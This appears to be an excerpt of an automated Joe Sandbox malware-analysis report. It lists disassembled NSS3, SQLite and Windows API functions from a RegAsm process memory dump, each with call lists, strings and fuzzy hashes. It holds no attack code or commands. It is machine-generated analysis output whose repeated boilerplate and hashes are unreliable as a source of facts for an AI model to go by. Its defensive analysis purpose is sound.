Part of subcall function 6C156AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C156B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C156F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C156F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C278FE0,00000000), ref: 6C156F6B
PR_SetError.NSS3(FFFFE005,00000000,6C157D8F,?,?), ref: 6C156FE1

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: a06c086df9b612dd6d70ca4f47554eae0ca53fd3cf9cd2cba6905cda3c0e0431
Instruction ID: 8d6c3bafcea4a470b5f4b045442d5fb6842a206a31bad45be93aaa5f276fbb01
Opcode Fuzzy Hash: a06c086df9b612dd6d70ca4f47554eae0ca53fd3cf9cd2cba6905cda3c0e0431
Instruction Fuzzy Hash: 5971A0B1E1024A9FDB00CF55CD50BAAB7A4BF64308F554266E828D7B11F731E9A4CBD0

Function 6C19ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE10
EnterCriticalSection.KERNEL32(?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C17D079,00000000,00000001), ref: 6C19AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE7F
TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEF1
free.MOZGLUE(6C17CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C17CDBB,?), ref: 6C19AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AF30

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 6c36f1de36ab4b165ea5e6830a0da336518d0d18dba0faedec391c4738e6ee00
Instruction ID: 93a6d4648d2a0c20d1a0039344758ca4a606634b3831f409d93b4feb9e127cd2
Opcode Fuzzy Hash: 6c36f1de36ab4b165ea5e6830a0da336518d0d18dba0faedec391c4738e6ee00
Instruction Fuzzy Hash: F7516DB1E00602AFDB059F29D884B6AB7B4BF15318F144664EC1997A51E731F8A8CBD1

Function 6C174CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C17AB7F,?,00000000,?), ref: 6C174CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C17AB7F,?,00000000,?), ref: 6C174CC8
TlsGetValue.KERNEL32(?,6C17AB7F,?,00000000,?), ref: 6C174CE0
EnterCriticalSection.KERNEL32(?,?,6C17AB7F,?,00000000,?), ref: 6C174CF4
PL_HashTableLookup.NSS3(?,?,?,6C17AB7F,?,00000000,?), ref: 6C174D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C174D10

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C174D26

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C174D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C174DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C174E02

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: ae38114c7d7e9f479f4ab606cc64d24500a5e4349143ee29ee93325866698fad
Instruction ID: f0d1e58995f3a3e4f5c6661a992e19262b2fd8b959b883cf286fcd96dbca9b39
Opcode Fuzzy Hash: ae38114c7d7e9f479f4ab606cc64d24500a5e4349143ee29ee93325866698fad
Instruction Fuzzy Hash: B241E7B59002059BEB10AF69EC44A6A77B8EF2525CF054170EC18C7B51FB31D964CBF2

Function 6C152E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C152CDA,?,00000000), ref: 6C152E1E

Part of subcall function 6C1AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C159003,?), ref: 6C1AFD91
Part of subcall function 6C1AFD80: PORT_Alloc_Util.NSS3(A4686C1B,?), ref: 6C1AFDA2
Part of subcall function 6C1AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C1B,?,?), ref: 6C1AFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C152E33

Part of subcall function 6C1AFD80: free.MOZGLUE(00000000,?,?), ref: 6C1AFDD1

TlsGetValue.KERNEL32 ref: 6C152E4E
EnterCriticalSection.KERNEL32(?), ref: 6C152E5E
PL_HashTableLookup.NSS3(?), ref: 6C152E71
PL_HashTableRemove.NSS3(?), ref: 6C152E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C152E96
PR_Unlock.NSS3 ref: 6C152EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C152EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C152EC5

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 4ed9725cfb15f980dfe5b38e85505ba1e4ea362cd646136bf7052afcfcd58381
Instruction ID: 08ce60b2b6af7fb532fe222c826f35a7592d68f06879a008b53cda60fffe1d26
Opcode Fuzzy Hash: 4ed9725cfb15f980dfe5b38e85505ba1e4ea362cd646136bf7052afcfcd58381
Instruction Fuzzy Hash: 162104B6B00201A7EF015B68EC0DB9B3A79EB6235DF054830ED2892751FB32D569D7A1

Function 6C13FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C13FD18
sqlite3_initialize.NSS3 ref: 6C13FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C13FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C13FD99
sqlite3_free.NSS3(00000000), ref: 6C13FE3C
sqlite3_free.NSS3(?), ref: 6C13FEE3
sqlite3_free.NSS3(?), ref: 6C13FEEE

Strings

simple, xrefs: 6C13FC79

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: a67886c49bb995df772526fd3dbf5d985e7183747fea2c2167382bff85f96997
Instruction ID: 23a33039fe2393a19443228cd5535bb8dd211bff600668f568da22f9e58a2b0c
Opcode Fuzzy Hash: a67886c49bb995df772526fd3dbf5d985e7183747fea2c2167382bff85f96997
Instruction Fuzzy Hash: 1D918EB0A012158FDB04CF55C884AAAB7B1FF9431CF25C5A8DC2C9BB52E735E845CB90

Function 6C145CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C145EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C145EED

Strings

%s at line %d of [%.10s], xrefs: 6C145EE0
invalid, xrefs: 6C145EBE
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C145E64
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C145ED1
API call with %s database connection pointer, xrefs: 6C145EC3
misuse, xrefs: 6C145EDB

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 2e006a5ac80a527ba887bc6e5392a901696ffbcdba9b804e257d7b38d0a59ff9
Instruction ID: 8ddf5a35d28697a434df8555c4ebb5e5e9df9d54d0b34723719431dc3b99b991
Opcode Fuzzy Hash: 2e006a5ac80a527ba887bc6e5392a901696ffbcdba9b804e257d7b38d0a59ff9
Instruction Fuzzy Hash: 13810570B056059BEB19CF15C858BAAB370BF5131CF198268D8195BF81C734EC46CBD2

Function 6C12DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C12DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C12DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C12DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C12DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C12DF78

Strings

%s at line %d of [%.10s], xrefs: 6C12DE61, 6C12DE90
database corruption, xrefs: 6C12DE5C, 6C12DE8B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C12DE52, 6C12DE81

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 08c4890d09c31d39fa2c56ba4fd081ba86a9f3545745f9bcae77081c1950e6ef
Instruction ID: 27c4bfc6629421c98e537d1cbf020ae6e91659832ce0c92d99a360913d3ec3e3
Opcode Fuzzy Hash: 08c4890d09c31d39fa2c56ba4fd081ba86a9f3545745f9bcae77081c1950e6ef
Instruction Fuzzy Hash: 0F8114787047049FD714EF25C880B6A77F1BF54308F15882DE89A8BB91EB39E885CB52

Function 6C0DCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C0DB999), ref: 6C0DCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C0DB999), ref: 6C0DD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C0DB999), ref: 6C0DD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C0DB999), ref: 6C22972B

Strings

%s at line %d of [%.10s], xrefs: 6C0DCFEC, 6C0DD018, 6C0DD029, 6C0DD03F, 6C22978B
database corruption, xrefs: 6C0DCFE7, 6C0DD013, 6C0DD028, 6C0DD039, 6C0DD03E, 6C229786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0DCFDD, 6C0DD00E, 6C0DD022, 6C0DD033, 6C229780

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 69e5aeab7d1d03cd580cd5aa02d5ccf7921c754fd16146121380f4ee56934285
Instruction ID: c62d73792931eb00ea27f4505b1d3ce07ee633b2b45e81145c7788989789f55c
Opcode Fuzzy Hash: 69e5aeab7d1d03cd580cd5aa02d5ccf7921c754fd16146121380f4ee56934285
Instruction Fuzzy Hash: 65614871A003148BD310CF29C840BA6B7F5EF95318F69816DE8889BB82D376E947C7A1

Function 6C1DEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C1FA4A1,?,00000000,?,00000001), ref: 6C1DEF6D

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

htonl.WSOCK32(00000000,?,6C1FA4A1,?,00000000,?,00000001), ref: 6C1DEFE4
htonl.WSOCK32(?,00000000,?,6C1FA4A1,?,00000000,?,00000001), ref: 6C1DEFF1
memcpy.VCRUNTIME140(?,?,6C1FA4A1,?,00000000,?,6C1FA4A1,?,00000000,?,00000001), ref: 6C1DF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C1FA4A1,?,00000000,?,00000001), ref: 6C1DF027

Strings

dtls13, xrefs: 6C1DEF33

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: da5583158babdb58ac8015ae2a31bd6eef8ebd8c0880469b80ca865ffe9b3c26
Instruction ID: b2a0607c940344532258dd2a26a5bbf05f09c130a35efb31310abde74f8febba
Opcode Fuzzy Hash: da5583158babdb58ac8015ae2a31bd6eef8ebd8c0880469b80ca865ffe9b3c26
Instruction Fuzzy Hash: E4311271A00215AFCB10DF28DC80B9AB7E4EF48748F168069EC189B751E731FA15CBE2

Function 6C15AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C15AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C279500,6C153F91), ref: 6C15AFD2

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

DER_GetInteger_Util.NSS3(?), ref: 6C15B007

Part of subcall function 6C1A6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C151666,?,6C15B00C,?), ref: 6C1A6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C15B02F
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C15B046
PL_FreeArenaPool.NSS3 ref: 6C15B058
PL_FinishArenaPool.NSS3 ref: 6C15B060

Strings

security, xrefs: 6C15AFB8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: fda01dfcad6d019907bd13260e3d633268f11369daf212ae27ab93391b563b5c
Instruction ID: 0e2b7072dcdc373e52bf8946a34b3cef8be75b80dcf569cc533c0e5022e541b8
Opcode Fuzzy Hash: fda01dfcad6d019907bd13260e3d633268f11369daf212ae27ab93391b563b5c
Instruction Fuzzy Hash: EF3106B14043049BDB108F24DC45BAA77B4AF8636CF600619F974ABBD1E736D119CB96

Function 6C18ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C18ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C18AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C18AD23

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C18AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C18AD1C
hSession = 0x%x, xrefs: 6C18ACFE, 6C18AD0E
C_MessageDecryptFinal, xrefs: 6C18ACE1
n&l, xrefs: 6C18AD51, 6C18AD7B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$n&l
API String ID: 332880674-2835415195
Opcode ID: 08bd0f0b599431d609bf161ef7eeebad909c6f9e75ab7fa44c2ccfb0e814ee4f
Instruction ID: 76774970d04f2b2b910ecfa251c646b63d20d5d30bce1c21d5756ecb1d687d81
Opcode Fuzzy Hash: 08bd0f0b599431d609bf161ef7eeebad909c6f9e75ab7fa44c2ccfb0e814ee4f
Instruction Fuzzy Hash: 6B213AB06061089FDB00DB64DD8CB6A3375AB4170DF044525ED09DBBC2DF34A848CBA6

Function 6C19CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C19CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C19CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C19D079

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: ab11c69b19131f0c50203edb3e541a39aec0fcac341c0591084ce51bb7569ba0
Instruction ID: db8b39ee02ddfc31098100635048c1f705cd185ebbf000fd000dfd6050d47a11
Opcode Fuzzy Hash: ab11c69b19131f0c50203edb3e541a39aec0fcac341c0591084ce51bb7569ba0
Instruction Fuzzy Hash: 2EC199B5A002199BDB20DF24CC80BDABBB4BB58308F1541A8E94DA7741E775EA95CF90

Function 6C18DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C1997C1,?,00000000,00000000,?,?,?,00000000,?,6C177F4A,00000000), ref: 6C18DC68

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

